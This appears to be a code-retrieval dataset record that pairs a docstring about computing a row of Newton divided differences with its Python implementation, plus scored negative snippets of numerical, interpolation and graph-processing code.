Got {}\"\n \" dimensions\".format(feature, feature_range.ndim)\n )\n axis = feature_range\n else:\n uniques = np.unique(X.loc[:, feature])\n if uniques.shape[0] < grid_resolution:\n # feature has low resolution use unique vals\n axis = uniques\n else:\n # create axis based on percentiles and grid resolution\n emp_percentiles = mquantiles(\n X.loc[:, feature], prob=percentiles, axis=0\n )\n if np.allclose(emp_percentiles[0], emp_percentiles[1]):\n raise ValueError(\n \"percentiles are too close to each other, \"\n \"unable to build the grid. Please choose percentiles \"\n \"that are further apart.\"\n )\n axis = np.linspace(\n emp_percentiles[0],\n emp_percentiles[1],\n num=grid_resolution,\n endpoint=True,\n )\n values.append(axis)\n\n return _cartesian(values), values", "def create_data(f, x_vals):\n y_vals = []\n for i in x_vals:\n y_vals.append(f(x_vals[i]))\n return np.array(y_vals)", "def local_mean(x,y, n=10):\n\n xx, yy = (list(t) for t in zip(*sorted(zip(x, y)))) # sort x and y after x\n\n m = int(len(x)/n) # Number of data points in each group\n\n x_o, y_o = [], []\n x_sum, y_sum, v = 0, 0, 0\n j=1\n for i in range(len(x)):\n if v < m:\n x_sum += xx[i]\n y_sum += yy[i]\n v += 1\n else:\n x_o.append(x_sum/m)\n y_o.append(y_sum/m)\n x_sum, y_sum, v = 0, 0, 0\n j += 1\n\n return x_o, y_o", "def create_graph_from_lambda(f, xrange):\n out = []\n for x in xrange:\n out.append(f(x))\n return out", "def data_range(x):\n return max(x)-min(x)", "def averages(x,y):\n new_x = [x[0]]\n new_y = []\n\n cur_x = new_x[0]\n cur_ys = []\n for x_i, y_i in zip(x,y):\n if x_i == cur_x:\n cur_ys.append(y_i)\n else:\n new_y.append( sum(cur_ys)/float(len(cur_ys) ) )\n new_x.append( x_i )\n cur_ys = [y_i]\n cur_x = x_i\n new_y.append( sum(cur_ys)/float(len(cur_ys) ) )\n return new_x, new_y", "def range24(self, nx, ny, x_des):\n [c_d, a1, output] = [self.component_dependency['y_24'], self.dependency_matrix, []]\n for i in range(ny):\n [sum_i, row] = [[], a1[7 * ny + nx + i]]\n sum_i.append(np.sum(row))\n [assign, y] = [c_d[i], []]\n # :x_des = np.random.random_sample(4 * nx + 5 * ny) # this is an instance of the design vector\n [y.append(self.per_int.range_int([x_des[k]])) for k in range(4 * nx + 5 * ny) if row[k] == 1]\n output.append(np.sum(y) * 1 / sum_i)\n\n return output", "def makeLinearFunc(xList, startXY, endXY, middleXY=None):\r\n\r\n \"\"\" Make one or two linear functions from given coordinates\r\n and return the values (as a dict) for the x-values found in\r\n the xList. 
\"\"\"\r\n\r\n x1, y1 = startXY\r\n try: x2, y2 = middleXY\r\n except: pass\r\n x3, y3 = endXY\r\n\r\n # Always sort list first.\r\n xList.sort()\r\n # Don't extrapolate values - only calculate intermediate values!\r\n xList = xList[xList.index(x1):xList.index(x3)+1]\r\n\r\n # The dict holding the final X- and Y-values.\r\n xyDict = {}\r\n\r\n # Iterate through all distances and stop when distUnit==middleX\r\n # and/or when distUnit/100==endX.\r\n for x in xList:\r\n # Define the straight line\r\n # Based on: f(x) = y1 + [(y2 - y1) / (x2 - x1)]·(x - x1)\r\n # And then assign the value to the xyList\r\n\r\n # If no middle was defined, give values based on two equations.\r\n if middleXY != None:\r\n if x<=x2:\r\n val = y1 + ( float((y2 - y1))/(x2 - x1) ) * (x - x1)\r\n else:\r\n val = y2 + ( float((y3 - y2))/(x3 - x2) ) * (x - x2)\r\n\r\n # Else, give all values based on one equation.\r\n else:\r\n val = y1 + ( float((y3 - y1)) / (x3 - x1) ) * (x - x1)\r\n\r\n xyDict[x] = round(val, 2) # The y-value is rounded to 2 decimals\r\n if x >= x3: # don't define influence beyond end point.\r\n break\r\n\r\n # Return a dict with y-values keyed by x-values.\r\n return xyDict", "def interval_split(a,b,split_ps):\n ps = [a] + [s for s in sorted(split_ps) if a < s < b] + [b]\n return [(p1,p2) for p1,p2 in zip(ps,ps[1:])]", "def expand_ranges(ranges):\n for low, high in low_high_pairs:\n for j in range(low, high+1):\n yield j", "def compute_rlzn_ensemble(fopen_list, var_list, range_list): #{{{\n\n sumprod = 0.0\n\n for afile in fopen_list:\n prodvars = 1.0\n for avar,arange in zip(var_list,range_list):\n if isinstance(avar,str):\n # open value in netCDF4 database\n var_value = afile.variables[avar]\n else:\n var_value = avar\n \n if arange is None:\n if hasattr(var_value, \"__len__\"): \n try:\n prodvars *= var_value[:]\n except:\n tmp = var_value[:]\n prodvars *= tmp[np.newaxis,:]\n del tmp\n else:\n prodvars *= var_value\n else:\n prodvars *= var_value[arange]\n\n sumprod += prodvars\n\n # compute ensemble with unbiased estimator\n ensmbl = sumprod/(len(fopen_list)-1)\n\n return ensmbl #}}}" ]
[ "0.58776325", "0.5662537", "0.5642036", "0.5495832", "0.5469611", "0.5420076", "0.5375376", "0.53669316", "0.53453207", "0.53439814", "0.53289247", "0.5299425", "0.5295588", "0.52585924", "0.52468276", "0.5246785", "0.5245637", "0.5245567", "0.52296543", "0.5221779", "0.5213703", "0.5212454", "0.5208512", "0.52083296", "0.5201708", "0.5194486", "0.51711047", "0.5168863", "0.5165443", "0.5120755", "0.5114761", "0.5102751", "0.50785375", "0.5054189", "0.505072", "0.50472754", "0.50416267", "0.503469", "0.5019454", "0.5018101", "0.5010577", "0.5008813", "0.50058043", "0.5002213", "0.49998733", "0.4996806", "0.49906522", "0.49867833", "0.49822482", "0.4981303", "0.4980911", "0.49784392", "0.49747497", "0.49691847", "0.49691364", "0.49657494", "0.49621314", "0.49519378", "0.4946871", "0.49463037", "0.4942811", "0.49422556", "0.4934619", "0.49313468", "0.4926717", "0.49265236", "0.49243584", "0.4921028", "0.49185663", "0.49176183", "0.49169987", "0.49095422", "0.4908786", "0.49083984", "0.4907138", "0.4887863", "0.48860237", "0.48834684", "0.48813796", "0.4877188", "0.48745123", "0.48739085", "0.48698267", "0.48692703", "0.4865313", "0.48593545", "0.48577893", "0.48567805", "0.48494112", "0.48477614", "0.4838593", "0.4832895", "0.48318925", "0.48307568", "0.48277205", "0.48213023", "0.48212478", "0.48207626", "0.48200655", "0.48200542" ]
0.58207065
1
Takes a list of divided-difference nodes and calculates a new divided-difference node from each adjacent pair in nodes_to_compute. In other words, it computes the next level of the so-called Newton second interpolation form tree (the divided-difference table).
def calculate_divided_differences_row(nodes_to_compute):
    divided_differences = []
    if len(nodes_to_compute) == 1:
        return None
    for i in range(0, len(nodes_to_compute) - 1):
        child = DividedDifferenceNode.create_child_node(nodes_to_compute[i], nodes_to_compute[i + 1])
        child.calculate_value()
        divided_differences.append(child)
    for node in divided_differences:
        print(node, end='')
    print('\n')
    return divided_differences
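Note for readers of this record: the snippet depends on a DividedDifferenceNode class that is not included in the document field. A minimal, runnable sketch follows; the constructor signature and the attribute names x_min, x_max, left, and right are assumptions reconstructed from the call sites, while calculate_value implements the standard divided-difference recurrence f[x_i,...,x_j] = (f[x_{i+1},...,x_j] - f[x_i,...,x_{j-1}]) / (x_j - x_i).

# Hypothetical minimal sketch of the node class used above; everything
# except the names create_child_node and calculate_value is an
# assumption, not taken from this record.
class DividedDifferenceNode:
    def __init__(self, x, divided_difference, x_min=None, x_max=None):
        self.x = x                                # abscissa (set for leaf nodes)
        self.divided_difference = divided_difference
        # Range of abscissas this node covers; needed for the recurrence.
        self.x_min = x if x_min is None else x_min
        self.x_max = x if x_max is None else x_max
        self.left = None
        self.right = None

    @classmethod
    def create_child_node(cls, left, right):
        # The child spans the union of its parents' abscissa ranges.
        child = cls(x=None, divided_difference=None,
                    x_min=left.x_min, x_max=right.x_max)
        child.left, child.right = left, right
        return child

    def calculate_value(self):
        # f[x_i..x_j] = (f[x_{i+1}..x_j] - f[x_i..x_{j-1}]) / (x_j - x_i)
        self.divided_difference = (
            (self.right.divided_difference - self.left.divided_difference)
            / (self.x_max - self.x_min))

    def __str__(self):
        return ' {0:.4f} '.format(self.divided_difference)

# Usage with f(x) = x**2 sampled at x = 0, 1, 2: the reduced row holds
# f[x0,x1] = 1.0 and f[x1,x2] = 3.0.
leaves = [DividedDifferenceNode(x, x ** 2) for x in (0.0, 1.0, 2.0)]
row = calculate_divided_differences_row(leaves)

Applying the function repeatedly until a single node remains yields the coefficients of the Newton form, which is exactly what the calculate_divided_differences negative below does with its while loop.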
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def calculate_divided_differences(nodes):\n nodes_to_compute = []\n divided_differences = []\n for node in nodes:\n nodes_to_compute.append(DividedDifferenceNode(x=node[0], divided_difference=node[1]))\n\n divided_differences.append(tuple(nodes_to_compute))\n\n while len(nodes_to_compute) > 1:\n next_node_row = calculate_divided_differences_row(nodes_to_compute)\n divided_differences.append(tuple(next_node_row))\n nodes_to_compute = next_node_row\n\n return divided_differences", "def calculate_newton_interpolation(divided_differences):\n polynomial = []\n for i, divided_differences_row in enumerate(divided_differences):\n polynomial_part = '({0})'.format(divided_differences_row[0].divided_difference)\n\n for j in range(0, i):\n polynomial_part += '*(x-{0})'.format(divided_differences[0][j].x)\n\n polynomial_part += '+'\n polynomial.append(polynomial_part)\n polynomial_str = ''.join(polynomial)[:-1]\n\n print('Calculated polynomial: {0}'.format(polynomial_str))\n # Heuristic simplification of calculated polynomial\n simplified_polynomial = sy.simplify(polynomial_str)\n print(\"Simplified polynomial: {0}\".format(simplified_polynomial))\n return simplified_polynomial", "def compute_relations(nodes: List[Node]) -> None:\n # Calculate parents\n for node in nodes:\n node.parents = []\n for node in nodes:\n for child in node.children():\n child.parents.append(node)\n\n def compute_dominators(\n entry: Node,\n parents: Callable[[Node], List[Node]],\n dominators: Callable[[Node], Set[Node]],\n immediately_dominates: Callable[[Node], List[Node]],\n set_immediate_dominator: Callable[[Node, Optional[Node]], None],\n ) -> None:\n # See https://en.wikipedia.org/wiki/Dominator_(graph_theory)#Algorithms\n # Note: if `n` is unreachable from `entry`, then *every* node will\n # vacuously belong to `n`'s dominator set.\n for n in nodes:\n dominators(n).clear()\n if n == entry:\n dominators(n).add(n)\n else:\n dominators(n).update(nodes)\n\n changes = True\n while changes:\n changes = False\n for node in nodes:\n if node == entry:\n continue\n nset = dominators(node)\n for parent in parents(node):\n nset = nset.intersection(dominators(parent))\n nset.add(node)\n if len(nset) < len(dominators(node)):\n assert nset.issubset(dominators(node))\n dominators(node).intersection_update(nset)\n changes = True\n\n # Compute immediate dominator, and the inverse relation\n for node in nodes:\n immediately_dominates(node).clear()\n for node in nodes:\n doms = dominators(node).difference({node})\n # If `node == entry` or the flow graph is not reducible, `doms` may be empty.\n # TODO: Infinite loops could be made reducible by introducing\n # branches like `if (false) { return; }` without breaking semantics\n if doms:\n # There should be a unique max `len(dominators(d))` if the flowgraph\n # is reducible. 
Fall back to largest index for irreducible graphs.\n imdom = max(doms, key=lambda d: (len(dominators(d)), d.block.index))\n immediately_dominates(imdom).append(node)\n set_immediate_dominator(node, imdom)\n else:\n set_immediate_dominator(node, None)\n for node in nodes:\n immediately_dominates(node).sort(key=lambda x: x.block.index)\n\n def _set_immediate_dominator(node: Node, imdom: Optional[Node]) -> None:\n node.immediate_dominator = imdom\n\n def _set_immediate_postdominator(node: Node, impdom: Optional[Node]) -> None:\n node.immediate_postdominator = impdom\n\n entry = nodes[0]\n terminal = nodes[-1]\n assert isinstance(terminal, TerminalNode)\n\n # Compute dominators & immediate dominators\n compute_dominators(\n entry=entry,\n parents=lambda n: n.parents,\n dominators=lambda n: n.dominators,\n immediately_dominates=lambda n: n.immediately_dominates,\n set_immediate_dominator=_set_immediate_dominator,\n )\n\n # Compute postdominators & immediate postdominators\n # This uses the same algorithm as above, but with edges reversed\n compute_dominators(\n entry=terminal,\n parents=lambda n: n.children(),\n dominators=lambda n: n.postdominators,\n immediately_dominates=lambda n: n.immediately_postdominates,\n set_immediate_dominator=_set_immediate_postdominator,\n )\n\n # Iterate over all edges n -> c and check for backedges, which define natural loops\n for node in nodes:\n for child in node.children():\n if child not in node.dominators:\n continue\n # Found a backedge node -> child where child dominates node; child is the \"head\" of the loop\n if child.loop is None:\n child.loop = NaturalLoop(child)\n child.loop.nodes |= {child, node}\n child.loop.backedges.add(node)\n for parent in nodes:\n if reachable_without(parent, node, child):\n child.loop.nodes.add(parent)", "def compute_tree(self, tree):\n g_list_val, g_list_h = self._build_graph(tree) # return theano variable of each node\n list_val = self._traversal_tree(tree) #\n f = theano.function(g_list_val, g_list_h, allow_input_downcast=True)\n result = f(*list_val)\n return result", "def gradients(output_node, node_list):\r\n\r\n # a map from node to a list of gradient contributions from each output node\r\n node_to_output_grads_list = {}\r\n # Special note on initializing gradient of output_node as oneslike_op(output_node):\r\n # We are really taking a derivative of the scalar reduce_sum(output_node)\r\n # instead of the vector output_node. 
But this is the common case for loss function.\r\n node_to_output_grads_list[output_node] = [oneslike_op(output_node)]\r\n # a map from node to the gradient of that node\r\n node_to_output_grad = {}\r\n # Traverse graph in reverse topological order given the output_node that we are taking gradient wrt.\r\n reverse_topo_order = list(reversed(find_topo_sort([output_node])))\r\n #node_to_output_grad[output_node] = oneslike_op(output_node)\r\n \r\n \r\n \"\"\"TODO: Your code here\"\"\"\r\n \r\n for node in reverse_topo_order:\r\n #print(node)\r\n #print(node_to_output_grad)\r\n if not(node in node_to_output_grad):\r\n #node_to_output_grad[node] = node.op.gradient(node, sum_node_list ([node_to_output_grad[node1] for node1 in node_to_output_grads_list[node] ]))\r\n sum_node = sum_node_list (node_to_output_grads_list[node]) \r\n grad = node.op.gradient(node, sum_node)\r\n node_to_output_grad[node] = sum_node\r\n #print(grad)\r\n #print(len(node.inputs))\r\n for i in range(len(node.inputs)):\r\n #print(i)\r\n if (not(node.inputs[i] in node_to_output_grads_list)):\r\n node_to_output_grads_list[node.inputs[i]]=[]\r\n node_to_output_grads_list[node.inputs[i]].append(grad[i])\r\n \r\n #input_grad = \r\n \r\n \r\n '''for node1 in node_to_output_grads_list[node]:\r\n print(node1)\r\n if (node in node_to_output_grad):\r\n node_to_output_grad[node] = node_to_output_grad[node] + node_to_output_grad[node1]\r\n else:\r\n node_to_output_grad[node] = node_to_output_grad[node1]\r\n '''\r\n #print(\"node to output \")\r\n #print(node_to_output_grad)\r\n\r\n del reverse_topo_order\r\n # Collect results for gradients requested.\r\n grad_node_list = [node_to_output_grad[node] for node in node_list]\r\n return grad_node_list", "def insert_nodes(self):\n neighbour_max_distance = 5\n new_nodes = []\n for node in self.nodes:\n left_distance = node.get_distance(node.neighbour1)\n right_distance = node.get_distance(node.neighbour2)\n if left_distance > neighbour_max_distance:\n # halfway\n half_point = (\n node.x + (node.neighbour1.x - node.x) / 2,\n node.y + (node.neighbour1.y - node.y) / 2\n )\n new_node = Node(half_point)\n node.neighbour1.connect(node.neighbour1.neighbour1, new_node)\n new_node.connect(node.neighbour1, node)\n node.connect(new_node, node.neighbour2)\n new_nodes.append(new_node)\n new_nodes.append(node)\n\n if right_distance > neighbour_max_distance:\n # halfway\n half_point = (\n node.x + (node.neighbour2.x - node.x) / 2,\n node.y + (node.neighbour2.y - node.y) / 2\n )\n new_node = Node(half_point)\n node.neighbour2.connect(new_node, node.neighbour2.neighbour2)\n new_node.connect(node, node.neighbour2)\n node.connect(node.neighbour1, new_node)\n new_nodes.append(new_node)\n\n return new_nodes", "def job_tree(self):\n\n # 1. Enforce depth of 1 for steps\n def depth_one(steps):\n depth_one = []\n for step in steps:\n if type(step) is list:\n if type(step[0]) is list:\n depth_one.append(step[0])\n else:\n depth_one.append(step)\n else:\n depth_one.append([step])\n return depth_one\n\n # 2. 
Convert steps to list of node objects (0,1,2,3...)\n def assign_nodes(steps):\n nodes = [i for i in range(len(steps))]\n objects = list(\n set([elem for sublist in steps for elem in sublist]))\n\n # checks for multiple src and dst objects -- added when looking for\n # mutiples\n split_objects = []\n for obj in objects:\n if len(obj) > 1:\n new_objs = obj.split(\", \")\n split_objects.extend(new_objs)\n else:\n split_objects.append(obj)\n objects = split_objects\n del(split_objects)\n\n # populate with leafless trees (Node objects, no edges)\n for node in nodes:\n nodes[node] = Node(str(node))\n\n # search for leafy trees\n for obj in objects:\n\n # accounts for multiple drc/dst objects\n leaves = []\n for i, sublist in enumerate(steps):\n for string in sublist:\n if string.count(',') > 0:\n if obj in string:\n leaves.append(i)\n else:\n if obj in sublist:\n leaves.append(i)\n leaves = sorted(list(set(leaves)))\n\n if len(leaves) > 1:\n viable_edges = []\n\n # compute cross-product\n for leaf1 in leaves:\n for leaf2 in leaves:\n if str(leaf1) != str(leaf2) and sorted((leaf1, leaf2)) not in viable_edges:\n viable_edges.append(sorted((leaf1, leaf2)))\n\n # form edge networks\n for edge in viable_edges:\n n1, n2 = nodes[edge[0]], nodes[edge[1]]\n n1.add_edge(n2)\n n2.add_edge(n1)\n nodes[int(n1.name)], nodes[int(n2.name)] = n1, n2\n return nodes\n\n # 3. Determine number of trees and regroup by connected nodes\n def connected_nodes(nodes):\n proto_trees = []\n nodes = set(nodes)\n\n while nodes:\n n = nodes.pop()\n group = {n}\n queue = [n]\n while queue:\n n = queue.pop(0)\n neighbors = n.edges\n neighbors.difference_update(group)\n nodes.difference_update(neighbors)\n group.update(neighbors)\n queue.extend(neighbors)\n proto_trees.append(group)\n return proto_trees\n\n # 4. Convert nodes to nested dictionary of parent-children relations\n # i.e. adding depth -- also deals with tree-node sorting and path\n # optimization\n def build_tree_dict(trees, steps):\n # node sorting in trees\n sorted_trees = []\n for tree in trees:\n sorted_trees.append(\n sorted(tree, key=lambda x: int(x.name)))\n\n # retrieve values of the nodes (the protocol's containers)\n # for each tree ... may want to use dictionary eventually\n all_values = []\n for tree in sorted_trees:\n values = [steps[int(node.name)] for node in tree]\n all_values.append(values)\n\n # create relational tuples:\n all_digs = []\n singles = []\n dst_potentials = []\n for tree_idx in range(len(sorted_trees)):\n edge_flag = False\n tree_digs = []\n for node_idx in range(len(sorted_trees[tree_idx])):\n\n # digs: directed graph vectors\n digs = []\n dst_nodes = []\n node_values = all_values[tree_idx][node_idx]\n src_node = str(sorted_trees[tree_idx][node_idx].name)\n\n # ACTION ON MULTIPLE OBJECTS (E.G. 
TRANSFER FROM SRC -> DST\n # WELLS)\n # Outcome space: {1-1, 1-many, many-1, many-many}\n if len(node_values) == 2:\n # single destination (x-1)\n if node_values[1].count(\",\") == 0:\n dst_nodes = [i for i, sublist in enumerate(\n steps) if node_values[1] == sublist[0]]\n # multiple destinations (x-many)\n elif node_values[1].count(\",\") > 0:\n dst_nodes = []\n for dst in node_values[1].replace(\", \", \"\"):\n for i, sublist in enumerate(steps):\n if i not in dst_nodes and dst == sublist[0]:\n dst_nodes.append(i)\n\n # ACTION ON A SINGLE OBJECT\n elif len(node_values) == 1:\n dst_nodes = [i for i, sublist in enumerate(\n steps) if node_values[0] == sublist[0]]\n\n # Constructing tuples in (child, parent) format\n for dst_node in dst_nodes:\n dig = (int(dst_node), int(src_node))\n digs.append(dig)\n\n # else: an edge-case for dictionaries constructed with no edges\n # initiates tree separation via flag\n if digs != []:\n edge_flag = False\n tree_digs.append(digs)\n else:\n edge_flag = True\n digs = [(int(src_node), int(src_node))]\n tree_digs.append(digs)\n\n # digraph cycle detection: avoids cycles by overlooking set\n # repeats\n true_tree_digs = []\n for digs in tree_digs:\n for dig in digs:\n if tuple(sorted(dig, reverse=True)) not in true_tree_digs:\n true_tree_digs.append(\n tuple(sorted(dig, reverse=True)))\n\n # edge-case for dictionaries constructed with no edges\n if true_tree_digs != [] and edge_flag == False:\n all_digs.append(true_tree_digs)\n elif edge_flag == True:\n all_digs.extend(tree_digs)\n\n # Enforces forest ordering\n all_digs = sorted(all_digs, key=lambda x: x[0])\n\n # job tree traversal to find all paths:\n forest = []\n for digs_set in all_digs:\n\n # pass 1: initialize nodes dictionary\n nodes = OrderedDict()\n for tup in digs_set:\n id, parent_id = tup\n # ensure all nodes accounted for\n nodes[id] = OrderedDict({'id': id})\n nodes[parent_id] = OrderedDict({'id': parent_id})\n\n # pass 2: create trees and parent-child relations\n for tup in digs_set:\n id, parent_id = tup\n node = nodes[id]\n # links node to its parent\n if id != parent_id:\n # add new_node as child to parent\n parent = nodes[parent_id]\n if not 'children' in parent:\n # ensure parent has a 'children' field\n parent['children'] = []\n children = parent['children']\n children.append(node)\n\n desired_tree_idx = sorted(list(nodes.keys()))[0]\n forest.append(nodes[desired_tree_idx])\n return forest\n\n # 5. 
Convert dictionary-stored nodes to unflattened, nested list of\n # parent-children relations\n def dict_to_list(forest):\n forest_list = []\n for tree in forest:\n tString = str(json.dumps(tree))\n tString = tString.replace('\"id\": ', \"\").replace('\"children\": ', \"\").replace(\n '[{', \"[\").replace('}]', \"]\").replace('{', \"[\").replace('}', \"]\")\n\n # find largest repeated branch (if applicable)\n # maybe think about using prefix trees or SIMD extensions for better\n # efficiency\n x, y, length, match = 0, 0, 0, ''\n for y in range(len(tString)):\n for x in range(len(tString)):\n substring = tString[y:x]\n if len(list(re.finditer(re.escape(substring), tString))) > 1 and len(substring) > length:\n match = substring\n length = len(substring)\n\n # checking for legitimate branch repeat\n if \"[\" in match and \"]\" in match:\n hits = []\n index = 0\n if len(tString) > 3:\n while index < len(tString):\n index = tString.find(str(match), index)\n if index == -1:\n break\n hits.append(index)\n index += len(match)\n\n # find all locations of repeated branch and remove\n if len(hits) > 1:\n for start_loc in hits[1:]:\n tString = tString[:start_loc] + \\\n tString[start_loc:].replace(match, \"]\", 1)\n\n # increment all numbers in string to match the protocol\n newString = \"\"\n numString = \"\"\n for el in tString:\n if el.isdigit(): # build number\n numString += el\n else:\n if numString != \"\": # convert it to int and reinstantaite numString\n numString = str(int(numString) + 1)\n newString += numString\n newString += el\n numString = \"\"\n tString = newString\n del newString\n\n forest_list.append(ast.literal_eval(tString))\n return forest_list\n\n # 6. Print job tree(s)\n def print_tree(lst, level=0):\n print(' ' * (level - 1) + '+---' * (level > 0) + str(lst[0]))\n for l in lst[1:]:\n if type(l) is list:\n print_tree(l, level + 1)\n else:\n print(' ' * level + '+---' + l)\n\n # 1\n steps = depth_one(self.object_list)\n # 2\n nodes = assign_nodes(steps)\n # 3\n proto_forest = connected_nodes(nodes)\n # 4\n forest = build_tree_dict(proto_forest, steps)\n # 5\n self.forest_list = dict_to_list(forest)\n # 6\n print(\"\\n\" + \"A suggested Job Tree based on container dependency: \\n\")\n for tree_list in self.forest_list:\n print_tree(tree_list)", "def expand_tree(self, N=1):\n # type: (int) -> None\n assert self._initialized, 'Search not initialized.'\n for _ in range(N): \n x_rand = self.sample_free()\n x_nearest = self.nearest(x_rand)\n x_new = self.steer(x_nearest, x_rand)\n if self.coll_free(x_nearest, x_new):\n self.index+=1\n X_near = [x for x in self.near(x_new) if self.coll_free(x, x_new)]\n cost_min = self.costs[self.research_index(self.nodes,x_nearest)][1] + self.dist(x_nearest, x_new)\n x_min = x_nearest\n for x in X_near:\n cost = self.costs[self.research_index(self.nodes,x)][1] + self.dist(x, x_new)\n if cost < cost_min:\n cost_min = cost\n x_min = x\n \n self.nodes.append(x_new)\n j=self.research_index(self.nodes,x_min)\n self.parents[self.index,j]=1\n self.costs[self.index] = (x_new,self.costs[j][1] + self.dist(x_min, x_new))\n for x in X_near:\n k=self.research_index(self.nodes,x)\n if self.costs[self.index][1] + self.dist(x_new, x) < self.costs[k][1]:\n self.parents[self.index]=np.zeros(self.N)\n self.parents[self.index,k] = 1\n self.costs[k] = (self.costs[k][0],self.costs[self.index][1] + self.dist(x_new, x))", "def all_nodes_dfs(log_T, initial_state, min_score, sub_info, max_depth=1000000000000000000, maxtraversals=1000000000000000000):\n # default argument for 
sub_info: empty_sub_info = (np.array([], dtype=int), np.array([], dtype=int), 1000000000000000000)\n min_score = float(min_score) # make sure numba knows this is a float (otherwise, sometimes, it doesn't (bug in numba))\n order = np.zeros(log_T.shape, np.int64)\n for i in xrange(order.shape[1]):\n order[i] = (-log_T[i]).argsort()\n n_states = log_T.shape[0]\n node = [order[initial_state, 0]] # most likely first node\n node_idx = [0]\n lengths_dfs = [-1.0]\n nodes_dfs = [[-1, ]]\n for it in xrange(maxtraversals):\n # score and return current node if adequate\n score = log_T[initial_state, node[0]]\n for p in xrange(1, len(node)):\n score += log_T[node[p - 1], node[p]]\n if min_score <= score and syntax_check(np.array(node), sub_info, partial=False):\n lengths_dfs.append(-score)\n nodes_dfs.append(list(node))\n # next node ##\n # try adding a value at the end\n for next_idx, next_state in enumerate(order[node[-1]]):\n if min_score <= score + log_T[node[-1], next_state] and len(node) < max_depth \\\n and syntax_check(np.array(node + [next_state]), sub_info, partial=True):\n node.append(next_state)\n node_idx.append(next_idx)\n break\n # adding a value at the end failed, so we are a leave\n else:\n for p in xrange(len(node) - 1, -1, -1):\n if node_idx[p] != n_states - 1: # find where within the node to increase (and discard all others after)\n old_idx = node_idx[p]\n del node_idx[p:]\n del node[p:]\n node_idx.append(old_idx + 1)\n prev_state = node[p - 1] if p > 0 else initial_state\n node.append(order[prev_state, node_idx[p]])\n break\n else:\n break # end of the generator, can't increase even the root\n else:\n assert False, \"Number of traversals exceeded\"\n\n return lengths_dfs[1:], nodes_dfs[1:]", "def find_sharpest_fork_general(Nodes):\n pair_list = []\n Dis = np.array([])\n for n in Nodes:\n if n.parent is not None:\n if n.parent.parent is not None:\n a = n.parent.children\n if(isinstance(a, list)):\n if(len(a)==2):\n n1 = a[0]\n n2 = a[1]\n pair_list.append([n1 , n2])\n dis = LA.norm(a[0].xyz - a[1].xyz,2)\n Dis = np.append(Dis,dis)\n if(len(Dis)!= 0):\n (b,) = np.where(Dis == Dis.min())\n sharpest_pair = pair_list[b[0]]\n distance = Dis.min()\n else:\n sharpest_pair = [0,0]\n distance = 0.\n return sharpest_pair, distance", "def get_locations(nodes, tl, br):\n \n # Base cases:\n if len(nodes) == 1: # for singleton, only choice is to place in the single spot in 1x1 square\n return {nodes[0]: tl}\n if len(nodes) == 2: # for two nodes, arbitrarily chose to place the first node in top left\n return {nodes[0]: tl, nodes[1]: br}\n\n # Recursive case, need to create and solve subproblems:\n ret = {}\n\n num_edges = count_num_edges(nodes)\n if num_edges == 0: # for empty graphs, no need to run METIS, just assign arbitrarily\n i = 0\n for x in range(tl.x, br.x+1): \n for y in range(tl.y, br.y+1):\n if i < len(nodes):\n ret.update({nodes[i]: Point(x,y)})\n i += 1\n return ret\n\n filename = splitext(basename(sys.argv[1]))[0] + '.p.' + sys.argv[2] + '.yx.' + sys.argv[3] + '.drop.' + sys.argv[4] + '.' +\\\n '_'.join(['delete', str(tl.x), str(tl.y), str(br.x), str(br.y)]) \n\n # special case for the very first call of get_locations. For example, suppose that there are\n # 97 nodes on a 10x10 grid. Instead of dividing the 97 nodes into 2 equal partitions, we should\n # divide them into a partition of 90 nodes and a partition of 7 nodes. 
The former should be\n # placed on a 10x9 grid and te latter should be placed on a 1x7 grid.\n if len(nodes) < (br.x - tl.x + 1) * (br.y - tl.y + 1):\n assert tl == Point(0, 0)\n size_tl_nodes = (br.x + 1) * int(len(nodes) / (br.x + 1))\n if size_tl_nodes == len(nodes):\n ret.update(get_locations(nodes, tl=Point(0, 0), br=Point(br.x, len(nodes) / (br.x + 1) - 1)))\n return ret\n\n nodes_tl, nodes_br = partition(nodes, size_tl_nodes, filename)\n # complicated indexing here. As an example, for the 97 into 10x10 case, we want to send 90 nodes\n # to a rectangle spanned by tl=Point(0, 0) and br=Point(9, 8) and we want to send 7 nodes to a \n # rectangle spanned by tl=Point(0, 9) and br=Point(6, 9)\n ret.update(get_locations(nodes_tl, tl=Point(0, 0), br=Point(br.x, len(nodes) / (br.x + 1) - 1)))\n ret.update(get_locations(nodes_br, tl=Point(0, len(nodes) / (br.x + 1)), br=Point(len(nodes) % (br.x + 1) - 1, len(nodes) / (br.x + 1))))\n return ret\n\n if br.x - tl.x > br.y - tl.y: # if rectangle is wider than tall, split on y axis\n half = tl.x + (br.x - tl.x - 1) / 2\n size_tl_nodes = (half - tl.x + 1) * (br.y - tl.y + 1)\n else: # split on x axis\n half = tl.y + (br.y - tl.y - 1) / 2\n size_tl_nodes = (br.x - tl.x + 1) * (half - tl.y + 1)\n\n nodes_tl, nodes_br = partition(nodes, size_tl_nodes, filename)\n\n if br.x - tl.x > br.y - tl.y: # if rectangle is wider than tall, split on y axis\n ret.update(get_locations(nodes_tl, tl=tl, br=Point(half, br.y)))\n ret.update(get_locations(nodes_br, tl=Point(half + 1,tl.y), br=br))\n else: # split on x axis\n ret.update(get_locations(nodes_tl, tl=tl, br=Point(br.x, half)))\n ret.update(get_locations(nodes_br, tl=Point(tl.x, half + 1), br=br))\n\n return ret", "def find_sharpest_fork(nodes):\n pair_list = []\n Dis = np.array([])\n for n in nodes:\n if n.parent is not None:\n if n.parent.parent is not None:\n a = n.parent.children\n if(isinstance(a, list)):\n if(len(a)==2):\n n1 = a[0]\n n2 = a[1]\n if(len(n1.children) == 0 and len(n2.children) == 0):\n pair_list.append([n1 , n2])\n dis = LA.norm(a[0].xyz - a[1].xyz,2)\n Dis = np.append(Dis,dis)\n if(len(Dis)!= 0):\n (b,) = np.where(Dis == Dis.min())\n sharpest_pair = pair_list[b[0]]\n distance = Dis.min()\n else:\n sharpest_pair = [0,0]\n distance = 0.\n return sharpest_pair, distance", "def make_sidewalk_nodes(street, prev_node, curr_node, next_node):\n if prev_node is None:\n v = - curr_node.vector_to(next_node, normalize=False)\n vec_prev = curr_node.vector() + v\n prev_node = Node(None, vec_prev[0], vec_prev[1])\n elif next_node is None:\n v = - curr_node.vector_to(prev_node, normalize=False)\n vec_next = curr_node.vector() + v\n next_node = Node(None, vec_next[0], vec_next[1])\n\n curr_latlng = np.array(curr_node.location())\n\n v_cp_n = curr_node.vector_to(prev_node, normalize=True)\n v_cn_n = curr_node.vector_to(next_node, normalize=True)\n v_sidewalk = v_cp_n + 